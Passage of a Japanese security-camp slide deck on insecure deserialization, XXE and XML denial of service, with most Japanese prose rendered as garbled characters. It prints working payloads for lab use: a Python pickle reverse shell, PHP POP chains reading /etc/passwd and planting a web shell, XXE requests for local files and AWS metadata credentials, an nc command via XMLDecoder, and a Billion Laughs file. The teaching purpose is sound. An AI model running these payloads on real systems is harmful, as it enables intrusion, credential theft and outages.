  53.  બߟ՝୊&ղઆ w αʔό্Ͱ೚ҙίʔυ࣮ߦʹ੒ޭͨ͠ͱͯ͠΋݁Ռ͕Ϩεϙϯε΍6*্ʹग़ͯ ͘Δͱ͸ݶΒͳ͍ɻ w ϦόʔεγΣϧʹΑͬͯ೚ҙίʔυ࣮ߦͷ݁ՌΛ֬ೝͰ͖Δ ϦόʔεγΣϧͷ༻్ ೚ҙίʔυ࣮ߦͰ͖Δ͔΋͠Εͳ͍ίʔυ

  54.  બߟ՝୊&ղઆ w ୈҰҾ਺ʹࢦఆ͞Εͨ#BTFจࣈྻΛσίʔυ্ͨ͠ͰVOQJDLMFԽ͍ͯ͠Δ w QJDLMFԽ্ͨ͠Ͱ#BTFʹΤϯίʔυͨ͠จࣈྻΛࢦఆ͢Δ͜ͱͰ VOQJDLMF࣌ʹੜ੒͞ΕΔΦϒδΣΫτΛ੍ޚͰ͖Δ w ϚδοΫϝιουΛ࢖ͬͯϦόʔεγΣϧΛੜ੒͢ΔίʔυΛ࣮ߦ͢Ε͹ ղ͚Δ

    ํ਑

  55. બߟ՝୊&ղઆ  #!/usr/bin/env python3 # coding: UTF-8 import pickle import

    socket import os import base64 class GetReverseShell(object): def __reduce__(self): return (os.system, ('/bin/sh </dev/tcp/localhost/1234 >&0 2>&0',)) payload = pickle.dumps(GetReverseShell()) print(base64.urlsafe_b64encode(payload)) ϖΠϩʔυੜ੒

  56. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ରࡦ w ۃྗγϦΞϥΠζσγϦΞϥΠζΛߦΘͳ͍Α͏ʹ͢Δ w ୅ΘΓʹ+40/΍:".-ͳͲͷϑΥʔϚοτΛར༻͢Δ w γϦΞϥΠζσγϦΞϥΠζΛߦ͏ඞཁ͕͋Δ৔߹͸ɺσδλϧॺ໊Λ෇༩ ͠ɺվ͟ΜͰ͖ͳ͍Α͏ʹ͢Δ 

  57. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ߈ܸํ๏ʢ1)1ͷ৔߹ʣ w 1)1Ͱ͸TFSJBMJ[F Λ࢖ͬͯΦϒδΣΫτΛγϦΞϥΠζՄೳ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ࣍͠ͷ͕̎ͭ༗໊ w @@XBLFVQ ϝιου

    w @@EFTUSVDU ϝιου w γϦΞϥΠζ͞ΕͨจࣈྻΛVOTFSJBMJ[F ʹ౉͢͜ͱͰΦϒδΣΫτΛૠೖ ͢Δ߈ܸख๏੬ऑੑΛ1)10CKFDU*OKFDUJPOͱ͍͏ 

  58. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH 1)1ಛ༗ͷςΫχοΫ w ϚδοΫϝιουΛ࣋ͭΫϥεΛ௨ͯ͡௚઀͸࣮ߦͰ͖ͳ͍ϝιουΛ ࣮ߦ͢Δ߈ܸख๏ w ΦϒδΣΫτͷϓϩύςΟʢΫϥεͷϝϯόม਺ʣΛ੍ޚ͠ɺ ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ w λʔήοτ಺෦ͷίʔυΛ࠶ར༻͢Δ$PEF3FVTF"UUBDLͷҰछ

    w ଞʹ͸301ɺ3FUVSOJOUPMJCD͕͋Δ 

  59. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH Πϝʔδਤ  Ϋϥε Ϋϥε Ϋϥε Ϋϥε ΨδΣοτ ΨδΣοτ ΨδΣοτ

    ΨδΣοτ w ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ

  60. 1)1ಛ༗ͷςΫχοΫ  class Example { private $obj; function __construct() {

    // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB w 1045ύϥϝʔλEBUB͸ VOTFSJBMJ[F ͞ΕΔ w ϚδοΫϝιου͸ &YBNQMFΫϥεʹ͋Δ w @@XBLFVQϝιουͰ͸ ม਺PCKͷFWBMVBUF Λ ࣮ߦ͢Δ w FWBM Λݺͼग़͢ $PEF4OJQQFUΫϥεͷ FWBMVBUF Λ࣮ߦ͍ͨ͠ʜ ࣮ߦ͍ͨ͠ʂʂʂ

  61. 1)1ಛ༗ͷςΫχοΫ w &YBNQMFΫϥεͷม਺PCK ʹ$PEF4OJQQFUΫϥεΛ ࢦఆ w $PEF4OJQQFUΫϥεͷ ม਺DPEFʹ࣮ߦͨ͠ ίʔυΛࢦఆ w

    ͜ͷΑ͏ͳಈ࡞Λ͢Δ γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛࢦఆͰ͖Ε ͹0,  class Example { private $obj; function __construct() { // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $PEF4OJQQFUΫϥεʹॻ͖׵͑Δ ࣮ߦ͍ͨ͠ίʔυΛ ೖྗ

  62. 1)1ಛ༗ͷςΫχοΫ w γϦΞϥΠζ͞ΕͨΦϒδ ΣΫτΛੜ੒͢Δ1)1ίʔ υΛॻ͖ɺ࣮ߦ͢Δͱ ߈ܸίʔυ͕ಘΒΕΔ  <?php class CodeSnippet

    { private $code = "phpinfo();"; } class Example { private $obj; function __construct() { $this->obj = new CodeSnippet; } } echo serialize(new Example); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $ php pop-poc.php O:7:"Example":1:{s:12:"Exampleobj";O:11:"CodeSnippet":1: {s:17:"CodeSnippetcode";s:10:"phpinfo();";}}

  63. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ w ࣮ࡍʹ1SPQFSUZ0SJFOUFE1SPHSBNNJOHΛ΍Δʹ͸γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛฤूͨ͘͠ͳΔ͜ͱ΋͋Δ w গ͚ͩ͠ฤू͍ͨ͠৔߹ɺίʔυ͔Βੜ੒͍ͯͯ͠͸໘౗ʜ w ਓྗͰಡΊΔΑ͏ʹͳ͓ͬͯ͘ͱϦΫΤετத͔ΒγϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛγϡοͱݟ͚ͭΒΕͯศརͳ͜ͱ΋͋Δ͔΋ʜ

    

  64. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH  γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ <?php class Seccamp { private $year =

    0; public function set_year($year){ $this->year = $year; } public function get_year(){ return $this->year; } } $object = new Seccamp(); $object->set_year(2021); echo serialize($object); w ࠨʹࣔ͢4FDDBNQΫϥεΛ ୊ࡐʹղઆ͍ͯ͘͠ w ϝϯόม਺ZFBSΛ࣋ͭ w TFU@ZFBSͱHFU@ZFBSͷͭ ͷϝιου͕͋Δ w TFU@ZFBSΛݺͼग़͠੔਺ Ληοτ͍ͯ͠Δ $ serialize-poc.php O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;}

  65. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH  γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;} 0CKFDUΛࣔ͢0 จࣈ਺ Ϋϥε໊ ϓϩύςΟͷ਺ 4USJOHΛࣔ͢T จࣈ਺

    จࣈྻ *OUFHFSΛࣔ͢J ਺஋

  66. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζϑΥʔϚοτৄઆ w CPPMFBO w CWBMVF w JOUFHFS w JWBMVF

    w EPVCMF w EWBMVF  IUUQTJOTPNOJBTFDDPNEPXOMPBETQVCMJDBUJPOT1SBDUJDBM1)10CKFDU*OKFDUJPOQEG w /6-- w / w TUSJOH w TMFOHUIWBMVF w BSSBZ w BMFOHUI\LFZ WBMVFQBJST^

  67. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH 301ʹࣅ͍ͯΔ w ίʔυͷஅยΛগ࣮ͣͭ͠ߦ͍͖ͯ͠ɺ࠷ऴతʹ໨ඪΛୡ੒͢Δͱ͜Ζ͕ 301ʹࣅ͍ͯΔ w όΠφϦʹର͢ΔFYQMPJUςΫχοΫͷߟ͑ํ͕8FCͷੈքʹԠ༻͞Ε͍ͯΔ Α͏Ͱɺ͓΋͠Ζ͍ʂʂ 

  68. ԋश0CKFDU*OKFDUJPOʢ෼ʣ w ࣍ͷίϚϯυΛೖྗ͢Δͱ%PDLFSίϯςφ্ཱ͕͕ͪΓ·͢  $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd

    seccamp2021-b5 $ cd exercise/object-injection/ $ docker-compose build $ docker-compose up

  69. w IUUQMPDBMIPTUΛϒϥ΢βͰ։͘͜ͱͰԋश؀ڥʹ ΞΫηεͰ͖·͢ ԋश0CKFDU*OKFDUJPOʢ෼ʣ 

  70. ԋशղઆ0CKFDU*OKFDUJPO w ߨ࣮ٛࢪ࣌ʹ͸Ξοϓϩʔυ͍ͯ͠ͳ͔ͬͨ-FWFMɺ-FWFMΛ ղͨ͘ΊͷεΫϦϓτ͸(JU)VCϦϙδτϦʹ্͛ͯ͋Γ·͢ʂ w IUUQTHJUIVCDPNULNSVTFDDBNQCUSFFNBTUFSFYFSDJTF PCKFDUJOKFDUJPOTPMWFS 

  71. ԋशղઆ-FWFM 

  72. ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛ @@XBLFVQϝιουͰಡΈऔ͍ͬͯΔ w PCKFDUύϥϝʔλͰγϦΞϥΠζ͞ΕͨΦϒδΣΫτΛड͚औΓ VOTFSJBMJ[F͍ͯ͠Δ w QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUFJOHΫϥεΛγϦΞϥΠζͨ͠΋ͷ ΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUDQBTTXE͕ಡΈऔΕͦ͏ʂʂ

     ํ਑

  73. ԋशղઆ-FWFM 

  74. ԋशղઆ-FWFM 

  75. ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛSFBEϝιουͰ ಡΈऔ͍ͬͯΔ w ͨͩ͠ɺ-FWFMͱҧͬͯ4FUUJOHΫϥε಺Ͱ͸ϚδοΫϝιου͕ͳ͍ʜ w .BJOΫϥεͰ͸ϚδοΫϝιου಺Ͱϝϯόม਺pMFͷSFBEϝιουΛ࣮ߦ͢Δ ͕pMFʹ͸OVMM͕ࢦఆ͞Ε͍ͯΔʜ w

    QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUJOHΫϥεΛ.BJOΫϥεͷϝϯόม਺ pMFʹࢦఆ͠ɺγϦΞϥΠζͨ͠΋ͷΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUD QBTTXE͕ಡΈऔΕͦ͏ʂʂ  ํ਑

  76. ԋशղઆ-FWFM  <?php class Setting { public $path = "config.json";

    public function read() { $content = file_get_contents($this->path); echo $content; } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = "/etc/passwd"; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

  77. ԋशղઆ-FWFM 

  78. ԋशղઆ-FWFM 

  79. ԋशղઆ-FWFM w େମ-FWFMͱಉ͕ͩ͡ɺ4FUUJOHΫϥε಺Ͱ͸TZTUFNؔ਺Λ࢖͍ͬͯΔ w ೚ҙίʔυ࣮ߦͷνϟϯεʂʂʂ w DBUΛ࣮ߦͨ͠ޙʹͰίϚϯυΛ۠੾ͬͯFDIPίϚϯυͰXFCTIFMMͱͯ͠ ಈ࡞͢ΔQIQϑΝΠϧΛॻ͖ࠐΈͰ͖Δ w DBUDPOpHKTPOFDIPa

    QIQTZTUFN @(&5<DNE>  aBQIQ w 1BUIʹˢ͕࣮ߦ͞ΕΔΑ͏ͳจࣈྻΛࢦఆ͢ΔͱΑͦ͞͏ʂʂʂ  ํ਑

  80. ԋशղઆ-FWFM  <?php class Setting { public $path = "config.json";

    public function read() { system("cat " . $this->path); } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = 'config.json; echo \'<?php system($_GET["cmd"]);?>\' > a.php'; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

  81. ԋशղઆ-FWFM 

  82. ԋशղઆ-FWFM 

  83. ͜͜·Ͱͷ·ͱΊ w ༷ʑͳϓϩάϥϛϯάݴޠʹσγϦΞϥΠζγϦΞϥΠζͷ࢓૊Έ͕࣮૷͞ Ε͍ͯΔ w Ϣʔβ͕ࣗ༝ʹγϦΞϥΠζ͞ΕͨσʔλΛࢦఆͰ͖Δঢ়گ͸ةݥ w ϚδοΫϝιουΛ༻͍Ε͹༰қʹ3$&ʹ·Ͱ࣋ͪࠐΊΔ 

  84. ٳܜʢ෼ʣ

  85. ୈ̏ষɿ 9.-ύʔαΛૂͬͨ߈ܸ

  86. 9.-ͷ༻్ 9.-ͱ͸ w 9.-ʢF9UFOTJCF.BSLVQ-BOHVBHFʣ͸ϚʔΫΞοϓݴޠͷͻͱͭ w ϚʔΫΞοϓݴޠςΩετϑΝΠϧͷதʹɺςΩετͱಛఆͷه߸Λ ૊Έ߹Θͤɺ෇Ճ৘ใΛهड़ͨ͠΋ͷɻ)5.-ͳͲ w ֤छઃఆϑΝΠϧͷϑΥʔϚοτʹͳ͍ͬͯΔ͜ͱ͕ଟ͍ w

    "OESPJE.BOJGFTUYNMͳͲ 

  87. 9.-ͷߏ଄ 9.-ͷྫ w λάͷೖΕࢠߏ଄Ͱσʔλ͕දݱ͞ΕΔ  <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT

    lectures (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> MFDUVSFTλάͷ಺༰Λఆٛ MFDUVSFTλάΛ࢖ͬͯ಺༰Λهࡌ

  88. 9.-ͷߏ଄ w ཁૉΛఆ͍ٛͯ͠ΔՕॴΛ%5%ʢ%PDVNFOU5ZQF%FpOJUJPOʣͱ͍͏  <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT lectures

    (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> 9.-ͷྫ MFDUVSFTλάΛ ఆٛ͢Δ%5%

  89. 9.-ͷߏ଄ w ྫʹ্͛ͨ9.-Ͱ͸MFDUVSFTλάͷߏ੒ཁૉɺଐੑΛఆ͍ٛͯͨ͠   w &OUJUZͱݺ͹ΕΔ໊લ෇͖ఆ਺ͷఆٛ΋Ͱ͖Δ  %5%ʹΑͬͯఆٛ͞ΕΔ΋ͷ <?xml

    version="1.0"?> <!DOCTYPE lectures[]> <?xml version="1.0"?> <!ENTITY title "झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ">

  90. 9.-ͷߏ଄ w ఆ਺Λද͢&OUJUZʹ͸*OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZͷ̎छྨ͕͋Δ w 4:45&.ΩʔϫʔυΛ༻͍ͯ63*εΩʔϜ͔Β஋ΛऔಘͰ͖Δ w 8FCϖʔδͷ63-΍ϩʔΧϧͷϑΝΠϧύεΛࢦఆͯ͠ ֎෦͔Β஋Λऔಘ͢Δͷ͕&YUFSOBM&OUJUZ  *OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZ

    <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY xml-file SYSTEM "http://example.com/sample.xml"> <!ENTITY txt-file SYSTEM “file:///path/to/file.txt“> ]> <demo> <file>&xml-file</file> <file>&txt-file</file> </demo>

  91. 9.-FYUFSOBMFOUJUZJOKFDUJPO ֓ཁ w Ϣʔβ͕ࢦఆͨ͠9.-ϑΝΠϧΛॲཧ͢ΔΞϓϦέʔγϣϯ͕͋Δͱ͢Δ w &YUFSOBM&OUJUZΛ༻͍ͯϩʔΧϧͷϑΝΠϧɺ಺෦ωοτϫʔΫͷΞυϨε Λࢦఆͨ͠9.-ϑΝΠϧΛΞϓϦέʔγϣϯʹॲཧͤ͞Δ͜ͱͰ ຊདྷ͸Ϣʔβ͕஌Γಘͳ͍৘ใΛऔಘͰ͖Δ w ͜ͷ߈ܸख๏͸9.-&YUFSOBM&OUJUZʢ99&ʣJOKFDUJPOͱݺ͹ΕΔ

     <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY txt-file SYSTEM “file:///etc/passwd“> <!ENTITY aws-metadata SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/“> ]>

  92. 9.-FYUFSOBMFOUJUZJOKFDUJPO 443'΁ͭͳ͛Δ w ݱ୅ͷ8FCΞϓϦέʔγϣϯ͸αʔό̍ͭͰಈ͍͍ͯΔ͜ͱ͸গͳ͘ɺ༷ʑ ͳαʔό͕૊Έ߹Θͬͯ͞ಈ͍͍ͯΔ w ຊདྷϢʔβ͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦৘ใʹΞΫηε͢Δ߈ܸ͕443' w ֎෦͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦ωοτϫʔΫ্ʹଘࡏ͍ͯ͠Δαʔό͕ ର৅ʹͳΔ

    

  93. 9.-FYUFSOBMFOUJUZJOKFDUJPO &$ͷNFUBEBUBͷऔಘ w "84&$Ͱ͸಺෦ΞυϨεʹΫϨσϯγϟϧΛอ͍࣋ͯ͠Δ w IUUQTMBUFTUNFUBEBUBJBNTFDVSJUZDSFEFOUJBMT w গ͠લ·Ͱɺ&YUFSOBM&OUJUZΛ্͔ͭͬͯهΞυϨεʹΞΫηε͢Δͱ FYUFSOBMFOUJUZJOKFDUJPO͔Β443'ʹൃలͤ͞ΒΕͨ 

    <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY aws-metadata SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/“> ]> <demo> &aws-metadata </demo>

  94. 9.-FYUFSOBMFOUJUZJOKFDUJPO *.%4WʹΑΔ&$ͷ؇࿨ࡦ w ݱ୅Ͱ΋&$্ͰʹΫϨσϯγϟϧ͸ଘࡏ͢Δ͕ ؆୯ʹ͸ΞΫηεͰ͖ͳ͍ w ࣄલʹ165ϦΫΤετͰऔಘͨ͠τʔΫϯ͕ඞਢʹͳͬͨ w 9.-ͷFOUJUZ͔Β͸165ϦΫΤετ͸ඈ͹ͤͳ͍ͨΊɺ FYUFSOBMFOUJUZJOKFDUJPO͔ΒΫϨσϯγϟϧΛऔಘ͢Δ͜ͱ͸Ͱ͖ͳ͍

    w (PQIFSϓϩτίϧΛ࢖͑͹*.%4W͕༗ޮͰ΋ΫϨσϯγϟϧΛऔಘՄೳ͕ͩ 9.-ύʔαͱؔ܎ͳ͍࿩ʹͳͬͯ͠·͏ͷͰ͜͜Ͱ͸ׂѪ 

  95. 9.-FYUFSOBMFOUJUZJOKFDUJPO ରࡦ w 9.-ϑΝΠϧ͸ػೳ͕๛෋Ͱѻ͍͕Ή͔͍ͣ͠ͷͰ+40/ϑΝΠϧͳͲͷ ଞͷϑΝΠϧϑΥʔϚοτΛࢦఆ͢Δ w 9.-ύʔα͕%5%Λॲཧ͠ͳ͍Α͏ʹػೳΛ੍ݶ͢Δ 

  96. (IJESBͰͷྫ ࣄલ՝୊̍ w (IJESBʹ͸99&ͷ੬ऑੑ͕ͭ͋Δʢ೥݄࣌఺ʣ w $7& w $7& w ࠶ݱ؀ڥΛ࡞੒ͯ͠ɺ࣮ࡍʹ੬ऑੑΛ߈ܸͯ͠΋Β͏՝୊Λग़͍ͯ͠·ͨ͠

    

  97. $7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w ϓϩδΣΫτ৘ใΛอଘ͍ͯ͠ΔϓϩδΣΫτϑΝΠϧʢ HQSʣͷ಺෦ʹ 9.-ϑΝΠϧʢQSPKFDUQSQʣ͕ଘࡏ͢Δ w QSPKFDUQSQΛύʔε͢Δࡍʹ99&͕ՄೳͰ͋ͬͨ 

    ࣄલ՝୊ղઆ

  98. $7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ  ࣄલ՝୊ղઆ <?xml version="1.0" encoding=“UTF-8”?> <!DOCTYPE aaa

    [ <!ENTITY % dtd SYSTEM “http://localhost:5000/xxe”> %dtd; ]> <FILE_INFO> <BASIC_INFO> <STATE NAME="OWNER" TYPE=“string” VALUE=“tkmru” /> </BASIC_INFO> </FILE_INFO>

  99. $7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w (IJESBʹ͸σϑΥϧτͰ͸༗ޮʹͳ͍ͬͯͳ͍ɺ࣮ݧతͳػೳ͕ଘࡏ͢Δ w 9.-ϑΝΠϧʹهࡌ͞ΕͨύλʔϯͰόΠφϦ಺Λݕࡧ͢Δ 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹ੬ऑੑ͕ଘࡏͨ͠  ࣄલ՝୊ղઆ

  100. $7& w $PEF#SPXTFSͷ'JMFϝχϡʔ͔Β$POpHVSFʜΛબ୒͢Δͱ $POpHVSF&YQFSJNFOUBM1MVHJOT΢Οϯυ΢͕։͔ΕΔ w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹνΣοΫΛ͍ΕΔͱର৅ػೳ͕ ༗ޮʹͳΔ  ࣄલ՝୊ղઆ

  101. $7& w 8JOEPX'VODUJPO#JU1BUUFSOT&YQMPSFSΑΓμΠΞϩάΛग़ͤΔ w 3FBE9.-'JMFTϘλϯΛΫϦοΫ͢Δ͜ͱͰ9.-ϑΝΠϧΛಡ·ͤΒΕΔ  ࣄલ՝୊ղઆ

  102. $7& w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹಡ·ͤΔ9.-ϑΝΠϧΛੜ੒͢Δ ඞཁ͕͋Δɻ w 4DSJQU.BOBHFS͔Β%VNQ'VODUJPO1BUUFSO*OGP4DSJQUΛ࣮ߦ͢Δͱ બ୒͍ͯ͠Δؔ਺ͷ๯಄ͷػցޠ΍ΞυϨεͳͲͷ৘ใΛهͨ͠9.-ϑΝΠ ϧ͕ग़ྗ͞ΕΔ w ग़ྗ͞Εͨ9.-Λฤूͯ͠ಡΈࠐΉ͜ͱͰ99&Λߦ͑Δ

     ࣄલ՝୊ղઆ

  103. $7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ  ࣄલ՝୊ղઆ <?xml version="1.0" encoding="UTF-8"?> <java version="11.0.9"

    class="java.beans.XMLDecoder"> <object class="ghidra.bitpatterns.info.FileBitPatternInfo"> <void property="ghidraURL"> <string>TODO: url</string> </void> <void property="languageID"> <string>x86:LE:64:default</string> </void> ʢলུʣ <object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 5000</string> </void> </object> </java>

  104. ͜͜·Ͱ͸Α͘ղઆ͞Ε͍ͯΔ࿩ 9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏ w 99&͸̎ͭʹ෼ྨͰ͖Δ w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w 99&ͷଞʹ΋9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏͕͋Δ

    w #JMMJPOMBVHITʢ&YQPOFOUJBMFOUJUZFYQBOTJPOʣ w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w %FDPNQSFTTJPO#PNCͳͲ 

  105. 1ZUIPOΛ࢖ͬͯղઆ͠·͢ʂ w 1ZUIPOʹ͸9.-ύʔα͕ඪ४ϥΠϒϥϦͱͯ͠ଟ਺උΘ͍ͬͯΔ w ̍ͭͷݴޠͰෳ਺ͷ9.-ύʔαΛର৅ʹ؆୯ʹ1P$Λॻ͚ΔͨΊ ղઆʹ޲͍͍ͯΔ  ଞͷ9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏

  106. 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ 1ZUIPOެࣜαΠτهࡌͷඪ४ϥΠϒϥϦͨͪ  IUUQTEPDTQZUIPOPSHMJCSBSZYNMIUNMYNMWVMOFSBCJMJUJFT ͖ͬ͞ղઆͨ͠99&

  107. %FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ  1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

  108. %FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ w 1ZUIPOͷஶ໊ͳ9.-ϥΠϒϥϦͷϥούʔ w ηΩϡΞʹ9.-Λѻ͏ػೳΛ෇Ճͯ͘͠ΕΔ w JNQPSUจΛࠩ͠ସ͑Δ͚ͩͰηΩϡΞʹͳͬͯศར  1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

  109. 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ %FGVTFEYNMͷ3&"%.&ʹ͸΋ͬͱৄ͍͠ද͕هࡌ͞Ε͍ͯΔ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

  110. ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM

    w %FDPNQSFTTJPO#PNC  ΠϚίί

  111. #JMMJPO-BVHIT 9.-ʹΑΔ%P4߈ܸ w ΤϯςΟςΟΛ܁Γฦ͠ࢀরͤ͞Δ͜ͱʹΑͬͯ$16΁ͷෛՙɺϝϞϦফඅ ྔΛ্͛Δ%P4߈ܸ w αʔό΁େྔͷΞΫηεΛߦ͍ಈ࡞Λෆ҆ఆʹͤ͞Δͷ͕%P4߈ܸͩͱ ޡղ͞Ε͕ͪ w ΞϓϦέʔγϣϯͷಈ࡞͕ෆՄೳʹͳΔΑ͏ͳɺ

    ҟৗʹಈ࡞ΛҾ͖ى͜͢ͷ͕%P4߈ܸͰ͋ͬͯखஈ͸ԿͰ΋ྑ͍ w 9.-CPNC΍FYQPOFOUJBMFOUJUZFYQBOTJPO߈ܸͱ΋ݺ͹ΕΔ 

  112. #JMMJPO-BVHIT 9.-ϑΝΠϧྫ w MPMʢMPUTPGMBVHITʣͱ͍͏ΠϯλʔωοτεϥϯάΛ༻͍ͨϑΝΠϧ͕༗໊ w ͦͷͨΊ#JMMJPO-BVHITͱ໊෇͚ΒΕ͍ͯΔ  <?xml version="1.0"?> <!DOCTYPE

    lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>

  113. #JMMJPO-BVHIT ༗ޮͳ1ZUIPOϥΠϒϥϦ  IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

  114. ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ #JMMJPO-BVHITΛࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ 
